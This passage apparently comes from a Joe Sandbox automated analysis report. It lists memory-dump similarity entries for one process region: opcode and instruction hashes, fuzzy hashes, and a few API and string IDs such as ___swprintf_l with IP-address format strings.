                                          • Instruction Fuzzy Hash: 6401A4706416819BF323EB6CCD68F3637A9FB50B44F484298BA45CB7E6DB28D4428625
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1620000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                          • Instruction ID: eaecfe3251c1b4ec4e0c63d9e377174d5764c79f8792e28055976d8e9b0a8d77
                                          • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                          • Instruction Fuzzy Hash: 36F08937741A3347EB76AA2F9C10B2BA6D6DF90A50B05052D9755CBB80EF60D801C790
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1620000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                          • Instruction ID: 15e78bd5deadeafd181573e8cc5f924941c4b6b7e7fb3f7a70af860dfc909c05
                                          • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                          • Instruction Fuzzy Hash: 50F05E32F516529BE3219A4EDC81F16B7A9AFD5A60F1A0169A6089F364C762EC0287D0
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1620000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5289ddef042332ebd076859e23c0408d9a2b8238e75545ae9749a0f2e948427c
                                          • Instruction ID: 312189b427fbfe1abc59bba3acb85196aea15fe44989d789a847de8a3376060e
                                          • Opcode Fuzzy Hash: 5289ddef042332ebd076859e23c0408d9a2b8238e75545ae9749a0f2e948427c
                                          • Instruction Fuzzy Hash: BAF0AF716053489FC710EF68C942E1ABBE8FF98710F40865EB898DB390EA34E901C796
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1620000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                          • Instruction ID: 275b7817e1366264dbcb6e21bdcec9110f916500e67e5db910c99944c7d234e6
                                          • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                          • Instruction Fuzzy Hash: 00F024B2610200AFEB14EB21CC01F46B6EAEF98340F258478A545D72B0FAB0ED41C654
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1620000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: efc6cb3e934c516ca9ac8accee5599e3082291514eb180309067fa8b2f457d1f
                                          • Instruction ID: bd521e1b99fe83a60e08f2343c3b3461dec61248b24539a18647239411313c67
                                          • Opcode Fuzzy Hash: efc6cb3e934c516ca9ac8accee5599e3082291514eb180309067fa8b2f457d1f
                                          • Instruction Fuzzy Hash: D0F06270A1124DDFCB04EFA9C915A6EB7B9FF18300F10805AB955EB385DA34EA01CB54
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1620000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fa425a99480dee60be64fd1472517234ab15d924a64043cb44135482aeadf554
                                          • Instruction ID: b65d9b41bbf5c6f673948bc41f3f11a439d423b0f4734f130eafbc117af36160
                                          • Opcode Fuzzy Hash: fa425a99480dee60be64fd1472517234ab15d924a64043cb44135482aeadf554
                                          • Instruction Fuzzy Hash: D4F0B4319166E19FE7B2CB5CCC44B61BBD89B01674F0A49EADDAA87702EF24D8C0C650
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1620000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f602359ed1b65397efb07fd190325770286c68c887a790e03f2e05da4016fe74
                                          • Instruction ID: 5a15ac7618f9f2c7a1c05fa69e6947edd5cced7cc3a18787c39518acd86438f8
                                          • Opcode Fuzzy Hash: f602359ed1b65397efb07fd190325770286c68c887a790e03f2e05da4016fe74
                                          • Instruction Fuzzy Hash: 0AF0272E41A7C057CB336B2C64682D9FB95A742224F09144EF4A05720DC6B888C3D320
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1620000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 76122fbd656a8845112c99669300ac24b4948af0636c0ce4569643e1109a4379
                                          • Instruction ID: 9ca62d141f072f04d081c55756de5adff950e2b9d667ce47c8bcf1d5dec15abb
                                          • Opcode Fuzzy Hash: 76122fbd656a8845112c99669300ac24b4948af0636c0ce4569643e1109a4379
                                          • Instruction Fuzzy Hash: 1AF0E2715156B19FE322BB2CC948BD1BBD89B457A9F089636D40687612C764E8C1CA70
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1620000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                          • Instruction ID: b6f0f8756a3efeaed62d7e0bc025ea98b1072036f225694bdaa2b5f9b00da5b2
                                          • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                          • Instruction Fuzzy Hash: 83E0D8323006012BEB119E598CD0F47776FDFD2B10F04007DB5045F252CAE2DC19C2A8
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1620000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                          • Instruction ID: a76310a5e327038683e71ef22e4498b4d811f15b282b6af3e5af80cf0e5e6a1a
                                          • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                          • Instruction Fuzzy Hash: B1F0E572101214DFE3209F09DE48F52BBF8EB25364F01C129E6098B6A1D37AEC40CBA4
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1620000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                          • Instruction ID: f5761170ced4191b3723e14f82b540c78095413f4955ca644075a80b59d76dfa
                                          • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                          • Instruction Fuzzy Hash: E1F0A93A2047419BEB16CF19D850AE57BA8EB59360F000098FC468B341EB36E982CB94
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1620000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                          • Instruction ID: dae503397bb1fb847c525d6e149f50f8f07458d4aba41cac1f208c091199acad
                                          • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                          • Instruction Fuzzy Hash: C5E0D832244147EBD7213A598C00B66F7AADBD07E0F154529EA418F258DF70DC41C7DC
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1620000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                          • Instruction ID: e81990fcf3c3919feed7d20498310c62d1b5bad05914796d80db2f4b5ff09092
                                          • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                          • Instruction Fuzzy Hash: EFE04F72A40114BBDB21A79ACD05FAABEADDB94EA4F154059B702E7190E570EE00D690
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1620000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a7a33a131c91f1af19413a5ec4eef7a8bd757752bd6df9eaff26ed02d57062d7
                                          • Instruction ID: abec50580167d5111663074e12fc1298d86463415901c063380faad9b46b1d36
                                          • Opcode Fuzzy Hash: a7a33a131c91f1af19413a5ec4eef7a8bd757752bd6df9eaff26ed02d57062d7
                                          • Instruction Fuzzy Hash: E6E09272100694ABC722BB29DD11F8A77ABEB60374F01451DB51557194CB30A850C79C
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1620000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                          • Instruction ID: 55a69a62cca017df2bbade65872cf48ad929fa7be59d5d3c9d148f44954f0379
                                          • Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                          • Instruction Fuzzy Hash: 6EE06D31010711DBEB326B2ADC48B56BAE6AF50711F15882CA09A124F0C7759880CA44
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1620000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                          • Instruction ID: 5104a34c4a6df09811a138aac89fe676dce07a38675b4b096b74925e84545df1
                                          • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                          • Instruction Fuzzy Hash: 55E0C2347003059FE715CF19C484B627BB6BFD5A10F28C068A9488F705EB32E842CB40
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1620000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                          • Instruction ID: 827965a465a542569e44d912643863d31151cd5fa55bb4742458ae3456bd0590
                                          • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                          • Instruction Fuzzy Hash: EEE08C31401A10EFDB322E55DC10F5276AAFB94B20F10882DE085161A887B0AC82DA88
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1620000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 80bc672239cc62697c98c9f0e9f6ba1cd961ec775fdfddc36ae5109f0336682a
                                          • Instruction ID: c55ba6c9c1f295564b2438c8c9d9044ed7f947c66538e9a9deefe55ebfb86f30
                                          • Opcode Fuzzy Hash: 80bc672239cc62697c98c9f0e9f6ba1cd961ec775fdfddc36ae5109f0336682a
                                          • Instruction Fuzzy Hash: F7E08C321005A0ABC312FA5DDD11E4A73AEEBA5360F004129B55487294CA20AC40C798
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1620000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                          • Instruction ID: 48b8eaca80f8800c39263522972407ac023881fd65d5c83596ffe1ccf9544f7c
                                          • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                          • Instruction Fuzzy Hash: 8ED0A932214620ABD732AA1CFC00FD333EABB88B20F06045DB008C7250C364AC81CA88
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1620000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                          • Instruction ID: 9f792966d10b6b29d526aa0edef1ce27a76ef39179d5763fc1585330ccde96df
                                          • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                          • Instruction Fuzzy Hash: D2E0EC359506849BDF52DF59CE44F9ABBB9FB94B40F150058A5085B760C725A900CB40
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1620000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                          • Instruction ID: 1edd7437d80f3981120d829987575ca2020b5d199c2e74adbaea3422a6d0836c
                                          • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                          • Instruction Fuzzy Hash: 8ED02232217030A3CB285A956C00F63690AAB81A94F0A002C740B93A00C1048C43C2E0
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1620000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                          • Instruction ID: 5b8669dc562c42926a1320efbd2dd60724eff326585edec55914d3351679a1f2
                                          • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                          • Instruction Fuzzy Hash: 22D012371D054DBBCB119F66DC01F957BA9E764BA0F444020B508875A0C63AE950D584
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1620000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                          • Instruction ID: 8e6d7f2a2f077646581f4966985651eb870ec29d17a247e0b23fb1f715288a36
                                          • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                          • Instruction Fuzzy Hash: 71D09235212A80CFD61A8B0CC9A4B1533A8BB44A44F9144A0E442CBB22D728D980CA00
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1620000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                          • Instruction ID: 898bb058d0ab2b9c0ac280567dc8e7f873b91f167fce5f6781714057eb143810
                                          • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                          • Instruction Fuzzy Hash: 4AC01232150644AFC7119A95CD01F0177A9E798B40F000021F20447670C531E810D644
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1620000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                          • Instruction ID: 1da888a1ffd23f2f6d1ed23ebb64a8b3348727ab7cd13932615a5819eb462a53
                                          • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                          • Instruction Fuzzy Hash: 7AD01236100249EFCB01DF51C890D9AB72BFBD8710F108019FD19077108A31ED62DA50
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1620000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                          • Instruction ID: 1952683112a5c17352a39a567507af7f6c6cb408be327dfceb1eb8dbd3d4321c
                                          • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                          • Instruction Fuzzy Hash: 15C04C757015418FCF15DB19D794F4577E4F754740F1518D0E905CB721E724EC01CA10
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1620000_file.jbxd
                                          Similarity
                                          • API ID: ___swprintf_l
                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                          • API String ID: 48624451-2108815105
                                          • Opcode ID: 77989b502df8ef079012760f1be885a0010c41df6be4798d49829ce6bbda7714
                                          • Instruction ID: 912fbd5fb47ec098614e82d2b7318654891f0673a3deb3bfade57faddd848c31
                                          • Opcode Fuzzy Hash: 77989b502df8ef079012760f1be885a0010c41df6be4798d49829ce6bbda7714
                                          • Instruction Fuzzy Hash: 6D51D4A5A00116BFCF21DB9D8D9097EFBBCBB18240754C12DE4A5D7641E334DE058BE0
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1620000_file.jbxd
                                          Similarity
                                          • API ID: ___swprintf_l
                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                          • API String ID: 48624451-2108815105
                                          • Opcode ID: fb378b6138d65276b250b2cec7bcedd460d660a1330e3d0363304de6000a092a
                                          • Instruction ID: 6b00d90878d125475011c0e2f04c22026e37f60639f79baa0c0a0bca32ad20b7
                                          • Opcode Fuzzy Hash: fb378b6138d65276b250b2cec7bcedd460d660a1330e3d0363304de6000a092a
                                          • Instruction Fuzzy Hash: 7751F572A00745EFDB32DE5CCC9487EFBF9AB44204B54849AF4D6D3682D674DE008B64
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1620000_file.jbxd
                                          Similarity
                                          • API ID: ___swprintf_l
                                          • String ID: %%%u$[$]:%u
                                          • API String ID: 48624451-2819853543
                                          • Opcode ID: aaa5a79c6ec5b709efb7ae89c911defc53617fb41a6b928e9e9deae4925911a6
                                          • Instruction ID: 0becd213493324b23ab71b81a621e2c2c47cd97c6f91266c52b74c59ccb431e3
                                          • Opcode Fuzzy Hash: aaa5a79c6ec5b709efb7ae89c911defc53617fb41a6b928e9e9deae4925911a6
                                          • Instruction Fuzzy Hash: AE21517BA00219EBDB11DF79CC44ABEBBF9EF54654F54011AE905E3241E730D9058BA1
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1620000_file.jbxd
                                          Similarity
                                          • API ID: ___swprintf_l
                                          • String ID: %%%u$]:%u
                                          • API String ID: 48624451-3050659472
                                          • Opcode ID: 3d30b0e9cba9f9192b10c4bd355d9328ffe061cb48f944746da201fe711fbef3
                                          • Instruction ID: 98447f995453fbc98a7af8ba9df55fa7892e72dda67ad710df150096a73b5a39
                                          • Opcode Fuzzy Hash: 3d30b0e9cba9f9192b10c4bd355d9328ffe061cb48f944746da201fe711fbef3
                                          • Instruction Fuzzy Hash: AD318472A00219EFDB21DF2DCC44BEEF7F8EB44614F55455AE949E3281EB309A448BA0